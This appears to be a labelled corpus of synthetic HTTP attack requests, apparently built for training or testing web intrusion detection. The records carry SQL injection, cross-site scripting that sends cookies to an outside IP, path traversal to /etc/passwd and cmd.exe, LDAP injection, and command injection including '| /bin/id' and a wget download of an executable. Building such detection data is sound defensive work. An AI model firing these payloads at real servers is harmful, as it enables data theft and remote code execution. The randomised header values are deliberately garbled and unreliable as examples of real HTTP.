Cache-Control: W99o='gBh'
Client-ip: 42.209.93.236
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="20"
Date: Mon, 24 Oct 05 05:19:09 CET
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: yht7tT=oeioef;eadai=ex2nIas
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Mon, 12 Apr 10 15:52:10 GMT
If-Unmodified-Since: Tue, 19 May 09 06:51:15 UTC
If-Match: "4nelpuV@OWJGSxHGJ"
If-None-Match: "ohWC_3App6WkEvSDwF"
If-Range: "5LkSCrlPbaT_H-Ke@"
Max-Forwards: 4
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: tfdyi wetoINl=Wpol
Range: 24492-281270
Referer: /f7lncy/asua/aQlijhlu/yivwndet/ioieatee.js
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: ghmau5zr2i/0.5.8.7
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 177x860
Via: FTP/2.4 88.175.11.153:85, 3.7 84.58.189.38
Transfer-Encoding: compress
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35391
Start - Id: 35189
class: SqlInjection
GET /auC/lUincludeAvar4Y0@c.asmx?leBpaehatRt=e%28oe%40tyec&3iouCsaJwop=%27+++%29++++UNION+ALL+SELECT++++4+++FROM+++++sC9ihduD+WHERE+++++%28%27%27+++%3D+%27&AAoleDe=15970 HTTP/1.0
Host: 220.153.252.172
Connection: keep-alive
Accept: video/quicktime;q=0.4, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Thu, 20 Nov 08 19:17:09 GMT
ETag: W/"MmDAZwouxSzTM9a"
Expect: twhn
From: sktrhbow@Tasrdtm7.st
If-Modified-Since: Fri, 03 Aug 07 15:25:10 UTC
If-Unmodified-Since: Fri, 16 Jan 04 06:24:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 53
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Et9m nEu55lo=aeeeo
Range: -76801,392-,94069-
Referer: /sim5r/rieoo/gnqrihTd/ined.exe
TE: trailers,deflate
Trailer: Referer
User-Agent: eosrensk (8lEsUTEv; b2ZtCB; n9HA6lD7.k; tMPrG0pE@)
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
UA-Pixels: 0990x1742
Via: eos/6.4 www.rtuHfees.js, 2.5 www.fdVslz.jpeg, FTP/8.4 154.58.43.245
Transfer-Encoding: identity
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35189
Start - Id: 47992
class: XSS
GET /H91ZC8pJJinputwindow.open-m/4jgdeiiiNoiae/uaEnadiouO.jpg?xTGJaccess_logvbscript=%3Cstyle++++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F167.182.171.113%2Fngti.sh%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&epoeeO=640201&mjeslXjya=%5CmMvdxbtns&Mselect744=0WJenjjxpj.m&wui=xbvq7eesp HTTP/1.1
Host: 125.12.205.214
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=2
Client-ip: 200.176.81.45
Cookie: cweeoney=711
Cookie2: $Version="01"
Date: Sat, 29 Oct 05 03:53:58 UTC
ETag: W/"9VxvwsiJ2eaRQNV5OqF"
Expect: tuecaeh
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Tue, 26 Jan 10 13:17:37 CET
If-Unmodified-Since: Wed, 07 Mar 07 04:14:47 CET
If-Match: *
If-None-Match: "SZU5_Kxk8sib7c.J5Ra"
If-Range: Sat, 27 Jun 09 04:52:23 GMT
Max-Forwards: 9
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Digest realm
Range: 2-,-873,110-95038
Referer: http://lteA.gov/saenvder/Wixems.txt
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: fSEG.e-5 http://www.dakisEz3.org
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 0.0 www.eoiaxnzR.shtml, 6.2 www.otTwn3.tiff
Transfer-Encoding: gzip
Upgrade: ujou/5.1, doRY4j/6.5, hEhh/2.5, uoids3/2.1, iawl/7.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47992
Start - Id: 36270
class: PathTransversal
GET /itporior/4nFAxeIBRw6@EAc/pzrnetno/s80tEf/qih9.html?1xuetomdefg36tN=49258212&rxdreohN1eDoa=94040&W89X8=072262&yPeceb3rr=UEsa&cetr=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: 43.17.182.42
Connection: close
Accept: text/*
Accept-Charset: euc-jp, cp-936;q=0.3, windows-874;q=0.5, iso-2022-jp;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=8
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Date: Thu, 01 Jul 04 18:33:42 CET
Expect: 100-continue
If-Unmodified-Since: Sat, 26 May 07 24:04:14 UTC
If-Match: "@mU.FFSwxjNxChB9QA7N"
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Referer: /ts0ald.tar.gz
User-Agent: hgnl0tpnag/2.9.2.9.1
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36270
Start - Id: 43565
class: OsCommanding
GET /vbscriptoshutdownTrKW@/tj1cMD4l4vM3D.MoC/s1AfCUHsDQPcRoWI/uena4tnewpere/evM/nW/zjt271yno1s2ibee5/tsHke/4wvntahsaOi7.png?7o72oawm=n+tt&mZlo=%2Fbin%2Fps%2500+%7C HTTP/1.0
Host: www.Nplftttng.de
Connection: tolJvarF
Accept: */*;q=0.2
Accept-Charset: euc-cn, windows-874
Accept-Encoding: 
Accept-Language: cvlotzl-angN, o9Cbhafc-t;q=0.5, 7Ng0rp-sysl;q=0.6, obihArNl-r
Cache-Control: max-age=2644
Client-ip: 32.52.143.48
Cookie: dsdlaaLoee=R&n;tiqhfhnHuaaw=3338507827;xuaefe=asBeaVhncdeuic1us
Cookie2: $Version="2"
Date: Wed, 21 Apr 10 20:39:34 UTC
ETag: W/"5iLoNVknU2PXMAfL"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Thu, 02 Feb 06 24:52:44 CET
If-Unmodified-Since: Sun, 25 Jun 06 05:24:26 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Jan 06 20:57:39 CET
Max-Forwards: 5
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: szoGA tiskrnt=veetaa
Authorization: Digest qop=auth
Range: -198504,6676-
Referer: http://www.etecIWM.net/ylbu/ecet.exe
TE: deflate,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.9 (Machintosh; U; Mac OS X 3.7; 9n-he; rv:2.0.1) Gecko/72331595
UA-CPU: x86
UA-Disp: 6029,0160,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 4.1 147.211.240.147, 1.5 www.sOhse.shtml
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 562 www.w7dtbosr.jpg "TDeee9Afma0tOoes" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 897186
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43565
Start - Id: 37478
class: LdapInjection
GET /wulueuln/erteu/vB/iiee4ahadU0ielnoeo8s/vFXFavC8TOPnullH/rcpxAetcVopeno2eA/hCn/-b/n1ONeGN1KjR07qELUy_.sh?h4meta8lsQ7OSI=cetrgr&ogaeaHstuineogO=2binstHCtmFI%29n4&eeh=1277 HTTP/1.1
Host: 213.31.45.108
Connection: Nge5ew
Accept: application/x-tar
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Cookie: eIorO68m=l.uxOpiFWZF;tynmeFnee=m<RyTas;dlbdr=59;1r2pfn=501;uEkiM=7470)(&(objectClass=oed)(|(sn    =  ee)(cn=Rppd  J*));4Sabrecn=neerdI\oee
Cookie2: $Version="465"
Date: Thu, 04 Mar 10 24:45:02 CET
ETag: "k0NQUqdCVpoxxSEOVAzR"
Expect: tjza
From: tmati@entc45i.fr
If-Modified-Since: Mon, 07 Apr 08 24:34:38 GMT
If-Unmodified-Since: Mon, 31 Dec 07 02:01:46 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Nov 07 21:02:56 GMT
Max-Forwards: 0
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic Nm1pUk9zaTp1ZXZjQXI=
Authorization: NTLM ZHNtaWVyZWduc3Q3aXV0bmkzYm1kZlN0ZWFFb3NyaW9o
Referer: http://www.cego9rh.it/ghThs/astmrv/7e3fe3ir.nsf
TE: chunked;q=0.7,trailers,trailers
Trailer: Upgrade
User-Agent: znLleizI0n (i-XnbYu.y@; a7_UwLj_Se)
UA-Disp: 6467,4421,8
UA-OS: Windows 95
UA-Color: color16
Via: HTTP/0.3 194.114.90.93, 3.1 www.Mleikjh.shtml, 3.5 www.n7gNebew.css
Transfer-Encoding: deflate
Warning: 677 51.35.224.146 "edtba6i7Eepe" "Sun, 25 Jan 04 03:07:08 GMT"
X-Forwarded-For: 84.127.146.130
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37478
Start - Id: 45417
class: PathTransversal
PUT /ofztFJM4PE/mw.6DF.hkOkcoQr/dx@T/tWi7@WBFWbfmJl-n-C/eN8Xr./le59nsr4i5L50Uje1krn/erzCa5q_/dBdfPl@jPwt2641shZ/4ui/xccathhus/4DRsV.bKANEgroup by-.dll? HTTP/1.1
Content-Length: 166
Content-Language: neynm1,eoysjIi
Content-Encoding: gzip
Content-Location: /lZNauhoq/cotsfl4.exe
Content-MD5: ZWlxc2lhZnJJYW9NMkR6bg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Dec 08 07:00:28 CET
Last-Modified: Sat, 17 Mar 07 03:53:15 CET
Host: www.iihEtd.ch
Connection: keep-alive
Accept: video/mpeg;q=0.9
Accept-Charset: gb2312;q=0.3
Accept-Encoding: deflate, gzip, compress, gzip;q=0.9, compress;q=0.4
Accept-Language: n-1mfg6;q=0.2, r-FhzGwcnk;q=0.7, 4-3svy;q=0.1
Cache-Control: only-if-cached
Client-ip: 147.195.122.195
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="9"
Date: Fri, 22 Jun 07 11:10:22 UTC
ETag: "6zBxCy6m7hhCDZBV"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Fri, 12 Feb 10 16:54:48 UTC
If-Unmodified-Since: Sun, 22 Feb 04 15:25:36 CET
If-Match: *
If-None-Match: "K3cHX8x_TZtY0j-"
If-Range: Sat, 16 Dec 06 24:14:16 GMT
Max-Forwards: 741
MIME-Version: 4.3
Pragma: lk='aog'
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Basic bmNlN25oOnlmYW1sZGtu
Range: -292636,082693-
Referer: /tnredrob/aa5aA9u.rar
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.1 (Windows; U; Windows NT 5.6; pR-6e; rv:8.6.7) Gecko/65590787
UA-CPU: PowerPC
UA-Disp: 193,273,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 863x2272
Via: 3.8 202.169.70.21, erin/9.9 www.trdir.png
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GalEnj5no7vt=hpva&htaccesv2qnc=01281282&Ris=../../../../../../../../../WINNT/autoexec.bat&EvHidEea=zyreplaceo/ oercfrexIe&pe=dE7YVaopM.&tJrcpn=5

End - Id: 45417
Start - Id: 43919
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.nyrEohan.be:25
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic;q=0.4
Accept-Encoding: compress;q=0.9, identity, deflate;q=0.9, gzip;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 22.30.133.135
Cookie: fromG6h=|tY;ziakrn8=shDfnGnNHX 
Cookie2: $Version="7"
Date: Mon, 30 Mar 09 14:33:50 GMT
ETag: W/"vie1Rh-65y4FyKK@u97g"
Expect: iahe=MeGsltt;ntEYm3e
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Thu, 27 Jan 05 17:52:30 GMT
If-Unmodified-Since: Wed, 25 Nov 09 19:38:05 UTC
If-Match: "wUYpfCXl6otd5uZX"
If-None-Match: *
If-Range: Sun, 17 Dec 06 16:19:22 CET
Max-Forwards: 25
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: Basic ZXNjUkM3bTplUHNsalE=
Range: 6652-,-36477,66590-93
Referer: http://ldaWnt.fr/ehtmr/Rciu/w5ax/owocsc/doei04sf.swf
TE: gzip;q=0.5
Trailer: Expect
User-Agent: Mozilla/9.3 (Windows; U; Win98 9.6; nr-ye; rv:7.3.5) Gecko/70900841
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: 6.3 www.isUmifr.jpeg, HTTP/2.8 www.ohw2g.jpeg:1
Transfer-Encoding: 3pir; riee=oetd
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 175 www.izidyp.gif "ortoaehswe5tr" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43919
Start - Id: 43747
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.j7odi0ec.gov:5532
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp, euc-cn;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 251.209.185.79
Cookie: oGCkxW1FI=Eh2;jnsq0mhftrd=onoeedhao
Cookie2: $Version="26"
Date: Mon, 04 Jul 05 06:04:31 UTC
ETag: W/"S2kqKS2NgMYdq_Ze"
Expect: fe8gaSr=na4I2h
From: m8Lou@dteama.it
If-Modified-Since: Sat, 10 Oct 09 01:36:50 CET
If-Unmodified-Since: Sat, 27 Jun 09 05:32:56 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 45
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: naeven zndoO=eonsiuNe
Authorization: NTLM ZTRubDJ0c3NQOW9BVTNzc2llc2VpdGR1SnRyZXB1dHdt
Range: 24481-,44476-
Referer: /eaiordm/bea0e/ovnnstg/atenRJm/n0ctrtbo.dll
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.6 (compatible; MSIE 6.5; Solaris; LerR)
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7271x959
Via: 1.8 203.84.253.48:641
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 36260359600073
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43747
Start - Id: 36745
class: OsCommanding
GET /IaasihEurhOn5eijeSuf/TK1VWlVl/8mKo7JQk/n-uRY9piNsm/iitH8eecTnqre/cD5XZcgCrk1HLi0/tywJ8q878-u8b.php4?rjn=y8Hsc7Tuh&Iseit=56&01.fi=0348&TmR90wie=%5Due&kqpUoc=oi92Bjy50&lZf=%5Cn+++++wget+++++http%3A%2F%2F164.188.44.227%3A6836%2Fnftp.exe&cedAeu=fnulldltu%25imdu%24tqo1Draa&erofuhun=NonY&rnOt=6ei2OovhDhU4&hnoe=ncg&OGeayloears=a2LT&Iht=93632&0i=38001808 HTTP/1.1
Host: 253.129.132.48
Connection: keep-alive
Accept: image/*, image/jpeg;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: iaolni-aziz, iblOe-io, uny-ethls;q=0.3, 1dtafd-sueiae;q=0.6
Cache-Control: max-age=3
Client-ip: 66.186.73.243
Cookie: anoz=<n@ah;oectrr=nr3;tuwmsdss=hOnlOmsrxrt3r;wjEFTW3Hl=yzdne7toxehaio
Cookie2: $Version="546"
Date: Sat, 03 Jan 09 12:12:38 UTC
ETag: "Pj4xEi@aI3WQBD3"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Sun, 21 Mar 10 09:40:02 GMT
If-Unmodified-Since: Mon, 12 Oct 09 17:28:32 UTC
If-Match: "9u1gCXJeugj11uS0qW"
If-None-Match: *
If-Range: Sat, 03 Apr 10 16:44:27 GMT
Max-Forwards: 3
MIME-Version: 1.3
Pragma: l=lootmT
Proxy-Authorization: ttsg7i nehfeHuT=4aeyn
Authorization: NTLM Z2FrZ0lzbTd0Y29Jd0VzbTBxdXMxZWNmbHNFaG9lZWx0ZXNwbWlhbjZvYWU=
Range: 50-7
Referer: /2riL9ala/gie2x/rpbnqo.msf
TE: gzip;q=0.2
Trailer: From
User-Agent: y4edoin (eixtdq9sf; w4E6jZBU; xex3E8e; 2uOEyK; t0CvcVUgji)
UA-CPU: Sparc
UA-Disp: 944,674,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1003x5848
Via: 9.3 www.etflo.css, 5.9 www.neotci7o.shtml
Transfer-Encoding: deflate
Upgrade: evenU/1.9, Quheec/0.8, sieT/8.6, e9Rslt/7.3, iZner/9.0
Warning: 827 200.163.181.184 "tisa" 
X-Forwarded-For: 4.110.8.55
X-Serial-Number: 51873709956197
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36745
Start - Id: 46223
class: PathTransversal
GET /344RTunionzlocation2ECx/i1oiyysigdsevCiosa/hlqntcemferDosq/gcJMk/R-IQnQ2tP/fboWOqkYS6nullAid/Xx1qths/hf5XIXfXjI/lhLcFja.DI/uyTzzZzzfMLB/t@NS6@HS1KBaieF23.js?lwwtoeswn=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&S0=vQqxlv&csB.8F3yqvoL=yirS HTTP/1.0
Host: 170.23.110.223
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: SfIfsma-nO
Cache-Control: min-fresh=46
Client-ip: 184.19.40.250
Cookie: JDFvSPBSdR=zennmoTAeolxrE9Iri;SRP9NgMy0=6Of9tuhncgrm;jets=935373;7N2hye4ypda=EeO4t;nnrseeti=ildIZHSg7;Qllgp=44
Cookie2: $Version="374"
Date: Tue, 03 Feb 09 19:09:22 CET
ETag: W/"T3S71sqPNBzZRCk"
Expect: tiesfh=tc5ceo;tebom
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Mon, 24 Jan 05 03:06:21 UTC
If-Unmodified-Since: Sun, 06 May 07 01:41:23 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Nov 07 24:52:34 CET
Max-Forwards: 6
MIME-Version: 5.5
Pragma: tinn2l=e
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic b2VpbzpIcGhyZQ==
Range: 3-320
Referer: /tidocA/HsmnsTl.exe
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.1 (X11; U; SunOS sun4u 4.7; Th-1r; rv:5.9.2) Gecko/87187836
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: compress
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 677 234.22.108.123:360 "tgee6rvkuora" "Mon, 22 Jun 09 20:41:00 CET"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46223
Start - Id: 37682
class: LdapInjection
PUT /KFnsaet/eearG4yratgs7/h@9gA_0WW30Y@Vjva/RrhpereermDesTase/rdN38WK5Up--vpO/iF/d9.3XLakMPwZnns/t5/HMI6Aand/uog2e/eFv8CK5-HxDSGJMZ.shtml? HTTP/1.1
Content-Length: 266
Content-Language: sklo,Nicw
Content-Encoding: gzip
Content-Location: http://www.rmar.net/hpdid/e2ws3t/5hai/uanso/szscH.php4
Content-MD5: c3RzM2lzenJ1c25tbHM2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 May 08 08:42:17 CET
Last-Modified: Thu, 12 Feb 09 07:04:37 GMT
Host: 131.109.52.149
Connection: uae2aufn
Accept: */*;q=0.8
Accept-Charset: macintosh;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 28.10.194.170
Cookie: ltiocsE5eoCnvt=uoEz6qe
Cookie2: $Version="649"
Date: Thu, 31 Jul 08 15:17:12 UTC
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Sun, 16 Mar 08 16:31:13 CET
If-Unmodified-Since: Sun, 01 Nov 09 16:03:35 GMT
If-Match: "1q7APrbXiB3QR7V"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: Tue, 12 Aug 08 17:32:29 CET
Max-Forwards: 70
MIME-Version: 8.1
Pragma: R=hpllf
Proxy-Authorization: Digest realm
Authorization: artndN iein9svf=ysroleo
Range: 6058-6,88-,-245437
Referer: http://leydn7.ch/li6oieea.gif
TE: trailers
Trailer: Accept-Encoding
User-Agent: x4Xg8z0zMw http://www.5xsge.st
UA-CPU: MIPS
UA-Disp: 1656,7743,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 6.1 www.hkime.tiff:2926
Transfer-Encoding: identity
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 969 167.196.254.57 "stSi" "Fri, 23 Jun 06 14:48:23 CET"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oe8LAeetaocttkx=aZWdad0iW&ERtwinntaform0W0c8=t;O8ov&5igaiXdoiey=5674815&tpliasioxeOco=622085&yil7etsf9o1B=6725980&lf66zooa5nhdyno=gtr0e<&infka7iisr=172707963&ottnbe1u7Tpc=%oechoautoexec:da/er8t&iAfdugsye4k4=")(targetfilter=(o=NetscapeRoot))

End - Id: 37682
Start - Id: 45299
class: PathTransversal
GET /l4eO8zipst/Emutioe.mspx?den=aeoe&KZEam0=yosmet&o7NChcV7=%27dRin3gSe&tltsrosceataeoa=3016&1sXo_nQD=9sex&neiorbbanee17e7=eeerrs&ggbompmwueo1vda=35692&ta3oAgvtbE=o+&eeiuaacqstUTaj=eyssnrwuu2eicmtxse&eormpei=oRexec+hhncPk%40%3D%5D&smeNaUIWqTF=1oDZcJC8&4hvlY8zdendi=eS.Zg&xeMJenhmemi=hB-BXJ2f&wfKs0nt5a=Ilb&hr0ou4okuli=eh HTTP/1.0
Host: www.nwprarir.gov
Connection: rohww
Accept: */*
Accept-Charset: *
Accept-Encoding: ../../../../../../../../../WINDOWS/autoexec.bat
Accept-Language: dpfslamp-czriuksi;q=0.4, Rxhtdw-m, nmoMam3p-coke, ina-iiel;q=0.1, 4eLg-nonot;q=0.2
Cache-Control: no-transform
Client-ip: 27.71.37.6
Cookie2: $Version="84"
Date: Thu, 28 Sep 06 11:45:58 UTC
If-Modified-Since: Tue, 26 Feb 08 10:36:36 CET
If-Match: *
If-None-Match: *
Max-Forwards: 826
MIME-Version: 8.6
Pragma: no-cache
Authorization: NTLM RXMxb2FkaVJlYWV0bjFhY3NzczRFaWhtRWVvcm43NHdqc01zb2lsczM=
Referer: /EGnnft/enirua8/6sdsol8.swf
User-Agent: txl6jsrutWaerr3can
UA-Color: color32
Transfer-Encoding: Tehtej; eGah6tt8=ewraail
Upgrade: eoc/0.4, w5qFeo/8.6, 8aald/8.9, Neo9gn/0.6, nirnu/4.7

null

End - Id: 45299
Start - Id: 44517
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 20.203.233.138
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: iso-8859-8-i, utf-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 59.223.109.143
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="4"
Date: Tue, 19 Aug 08 15:47:55 GMT
ETag: "yyCTde2YbaYtn_WvXx"
Expect: 100-continue
From: bsntalu@ofn3s.de
If-Modified-Since: Thu, 02 Feb 06 24:38:40 CET
If-Unmodified-Since: Sun, 28 Jun 09 11:24:47 UTC
If-Match: *
If-None-Match: "6mtLE695gjWc2wdkPTH5"
If-Range: "bd@HfnPBbLlSruUn"
Max-Forwards: 80
MIME-Version: 8.3
Pragma: iitshoiw='uae'
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: Digest opaque="oool"
Range: 0-753213
Referer: http://tf2aAhda.st/5g8oui2/ceSeie/etvLny/bl8nE.png
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.0 (compatible; Konqueror/2.3; Linux i386; r7r8n3nw2)
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: 0.4 144.152.225.64, 9.7 183.198.168.248, HTTP/9.3 9.233.72.70
Transfer-Encoding: compress
Upgrade: LasAP/0.2
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44517
Start - Id: 43335
class: OsCommanding
GET /6S-/mv5bMuSe6X/qAhQG.LrBZJQPvMZqna/fh3aeS3enFegt/a25eVAIsNn6jQVN6j.jpg?wihateeiro=%7C+%2Fbin%2Fid HTTP/1.1
Host: 195.122.236.58
Connection: keep-alive
Accept: application/*;q=0.7, audio/basic;q=0.9, application/*
Accept-Charset: iso-8859-9, iso-2022-jp;q=0.5, x-mac-japanese;q=0.2, x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 72.77.48.25
Cookie: 4nhalDsahreaEa=hmqxeaesoa;htpassu5IJGq5r=09;qJXFjoHe=erni;ueuthaacx1n=54;a7aneuetr=6511273577
Cookie2: $Version="4"
Date: Tue, 27 May 08 07:15:13 CET
ETag: "21fLlo7mOtYun2Bj1tw"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Wed, 05 Jan 05 14:56:12 UTC
If-Unmodified-Since: Mon, 30 Apr 07 12:24:45 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 20 Nov 08 21:10:06 UTC
Max-Forwards: 8961
